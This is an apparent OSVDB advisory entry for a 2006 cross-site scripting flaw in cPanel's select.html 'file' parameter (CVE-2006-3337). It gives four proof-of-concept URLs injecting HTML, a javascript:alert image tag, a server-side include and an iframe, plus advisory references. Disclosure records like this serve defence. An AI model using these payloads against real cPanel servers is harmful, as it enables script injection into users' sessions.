cPanel select.html file Variable XSS

2006-06-25T11:03:55
ID OSVDB:26866
Type osvdb
Reporter OSVDB
Modified 2006-06-25T11:03:55

Description

Manual Testing Notes

http://[target]:[Port]/[Dir]/x/files/select.html?dir=/&file=<h1><b>Your code here!!</b></h1>

http://[target]:2082/frontend/x/files/select.html?dir=/&file=<IMG src="javascript:alert('yeah');">

http://[target]:2082/frontend/x/files/select.html?dir=/&file=<!--#echo var="HTTP_REFERER" -->

http://[target]:2082/frontend/x/files/select.html?dir=/&file=<IFRAME SRC="index.html">

References:

Vendor Specific News/Changelog Entry: http://bugzilla.cpanel.net/show_bug.cgi?id=4282 Security Tracker: 1016383 Secunia Advisory ID:20840 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0529.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0578.html ISS X-Force ID: 27403 FrSIRT Advisory: ADV-2006-2547 CVE-2006-3337 Bugtraq ID: 18655